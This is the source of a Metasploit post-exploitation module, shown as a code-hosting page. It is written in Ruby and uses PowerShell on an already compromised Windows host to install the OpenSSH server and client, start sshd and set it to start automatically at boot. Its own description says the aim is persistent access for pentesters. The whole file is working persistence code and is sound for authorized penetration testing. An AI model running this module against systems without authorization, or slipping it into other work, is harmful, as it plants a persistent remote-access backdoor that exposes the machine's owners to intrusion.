Path: blob/master/modules/post/windows/manage/install_ssh.rb
19534 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Post::Windows::Priv7include Msf::Post::File8include Msf::Post::Windows::Powershell910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Install OpenSSH for Windows',15'Description' => %q{16This module installs OpenSSH server and client for Windows using PowerShell.17SSH on Windows can provide pentesters persistent access to a secure interactive terminal, interactive filesystem access, and port forwarding over SSH.18},19'License' => MSF_LICENSE,20'Author' => ['Michael Long <bluesentinel[at]protonmail.com>'],21'Arch' => [ARCH_X86, ARCH_X64],22'Platform' => [ 'win' ],23'SessionTypes' => [ 'meterpreter', 'shell' ],24'References' => [25['URL', 'https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_overview'],26['URL', 'https://github.com/PowerShell/openssh-portable']27],28'Notes' => {29'Stability' => [CRASH_SAFE],30'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],31'Reliability' => []32}33)34)35register_options(36[37OptBool.new('INSTALL_SERVER', [true, 'Install OpenSSH.Server for Windows', true]),38OptBool.new('INSTALL_CLIENT', [true, 'Install OpenSSH.Client for Windows', true]),39OptBool.new('UNINSTALL_SERVER', [true, 'Uninstall OpenSSH.Server for Windows', false]),40OptBool.new('UNINSTALL_CLIENT', [true, 'Uninstall OpenSSH.Client for Windows', false]),41OptString.new('SERVER_VER', [true, 'OpenSSH.Server version', 'OpenSSH.Server~~~~0.0.1.0']),42OptString.new('CLIENT_VER', [true, 'OpenSSH.Client version', 'OpenSSH.Client~~~~0.0.1.0']),43OptBool.new('AUTOSTART', [true, 'Sets sshd service to startup automatically at system boot for persistence', true])44]45)46end4748def run49# check admin privileges50unless is_system? || is_admin?51fail_with(Failure::NotVulnerable, 'Insufficient privileges to install or remove OpenSSH')52end5354# check if PowerShell is available55psh_path = '\\WindowsPowerShell\\v1.0\\powershell.exe'56if !file? "%WINDIR%\\System32#{psh_path}"57fail_with(Failure::NotVulnerable, 'No powershell available.')58end5960# uninstall OpenSSH.Server61if datastore['UNINSTALL_SERVER']62print_status('Uninstalling OpenSSH.Server')63uninstall_ssh_server64end6566# unintall OpenSSH.Client67if datastore['UNINSTALL_CLIENT']68print_status('Uninstalling OpenSSH.Client')69uninstall_ssh_client70end7172# install OpenSSH.Server73if datastore['INSTALL_SERVER']74print_status('Installing OpenSSH.Server')75install_ssh_server76end7778# install OpenSSH.Client79if datastore['INSTALL_CLIENT']80print_status('Installing OpenSSH.Client')81install_ssh_client82end83end8485def install_ssh_server86script = "Add-WindowsCapability -Online -Name #{datastore['SERVER_VER']}; "87script << 'Start-Service sshd; '88if datastore['AUTOSTART']89script << "Set-Service -Name sshd -StartupType 'Automatic'"90end91psh_exec(script)92end9394def install_ssh_client95script = "Add-WindowsCapability -Online -Name #{datastore['CLIENT_VER']}; "96psh_exec(script)97end9899def uninstall_ssh_server100script = 'Stop-Service sshd; '101script << "Remove-WindowsCapability -Online -Name #{datastore['SERVER_VER']}"102psh_exec(script)103end104105def uninstall_ssh_client106script = "Remove-WindowsCapability -Online -Name #{datastore['CLIENT_VER']}"107psh_exec(script)108end109end110111112